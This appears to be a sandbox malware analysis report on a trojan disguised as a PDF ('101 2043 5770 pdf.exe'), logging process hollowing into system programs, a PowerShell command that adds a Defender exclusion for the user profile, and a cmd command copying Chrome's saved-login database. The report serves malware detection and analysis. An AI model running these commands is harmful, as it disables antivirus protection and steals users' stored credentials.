Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E20DE mov eax, dword ptr fs:[00000030h] 6_2_059E20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059890DB mov eax, dword ptr fs:[00000030h] 6_2_059890DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h] 6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DD0C0 mov eax, dword ptr fs:[00000030h] 6_2_059DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DD0C0 mov eax, dword ptr fs:[00000030h] 6_2_059DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595C0F0 mov eax, dword ptr fs:[00000030h] 6_2_0595C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A20F0 mov ecx, dword ptr fs:[00000030h] 6_2_059A20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595A0E3 mov ecx, dword ptr fs:[00000030h] 6_2_0595A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A350D9 mov eax, dword ptr fs:[00000030h] 6_2_05A350D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059850E4 mov eax, dword ptr fs:[00000030h] 6_2_059850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059850E4 mov ecx, dword ptr fs:[00000030h] 6_2_059850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E60E0 mov eax, dword ptr fs:[00000030h] 6_2_059E60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059680E9 mov eax, dword ptr fs:[00000030h] 6_2_059680E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h] 6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h] 6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h] 6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h] 6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h] 6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h] 6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h] 6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h] 6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E4000 mov ecx, dword ptr fs:[00000030h] 6_2_059E4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F6030 mov eax, dword ptr fs:[00000030h] 6_2_059F6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595A020 mov eax, dword ptr fs:[00000030h] 6_2_0595A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595C020 mov eax, dword ptr fs:[00000030h] 6_2_0595C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A35060 mov eax, dword ptr fs:[00000030h] 6_2_05A35060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05962050 mov eax, dword ptr fs:[00000030h] 6_2_05962050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598B052 mov eax, dword ptr fs:[00000030h] 6_2_0598B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E6050 mov eax, dword ptr fs:[00000030h] 6_2_059E6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h] 6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05971070 mov ecx, dword ptr fs:[00000030h] 6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h] 6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h] 6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h] 6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h] 6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h] 6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h] 6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h] 6_2_05971070
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00DE39FE FormatMessageW,ConvertLengthToIpv4Mask,InetNtopW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,LocalFree,LocalAlloc,GetAdaptersAddresses,LocalFree, 9_2_00DE39FE
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7854F20 RtlAddVectoredExceptionHandler,RaiseFailFastException, 0_2_00007FF7D7854F20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D78BBE8C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7D78BBE8C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00DE53F0 SetUnhandledExceptionFilter, 9_2_00DE53F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00DE51A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_00DE51A0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory allocated: C:\Windows\System32\calc.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory allocated: C:\Windows\System32\cmd.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory allocated: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Windows\System32\calc.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Windows\System32\cmd.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread register set: target process: 4004 Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 4004 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Thread register set: target process: 4004
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Thread register set: target process: 4004
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000 Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: DE0000 Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Section unmapped: C:\Windows\System32\calc.exe base address: 400000 Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Section unmapped: C:\Windows\System32\cmd.exe base address: 400000 Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Section unmapped: C:\Windows\System32\svchost.exe base address: 400000 Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe Section unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Section unmapped: C:\Windows\System32\conhost.exe base address: C90000
Source: C:\Users\user\101 2043 5770 pdf.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe Section unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 240000
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E7C008
Source: C:\Windows\SysWOW64\ipconfig.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Windows\System32\calc.exe base: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Windows\System32\calc.exe base: 401000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Windows\System32\cmd.exe base: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Windows\System32\cmd.exe base: 401000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Windows\System32\svchost.exe base: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Windows\System32\svchost.exe base: 401000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 300A008
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000
Source: C:\Users\user\101 2043 5770 pdf.exe Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 2F07008
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00DE4ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 9_2_00DE4ACA
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2130140124.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2127441350.0000000000D69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +Progman
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000003.3076417197.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3074909396.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000098AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd31A
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: GetLocaleInfoEx, 0_2_00007FF7D78EC890
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: GetLocaleInfoEx, 0_2_00007FF7D78EB900
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: GetLocaleInfoEx, 0_2_00007FF7D78EC960
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7860860 GetSystemTimeAsFileTime, 0_2_00007FF7D7860860

Stealing of Sensitive Information

Source: Yara match File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
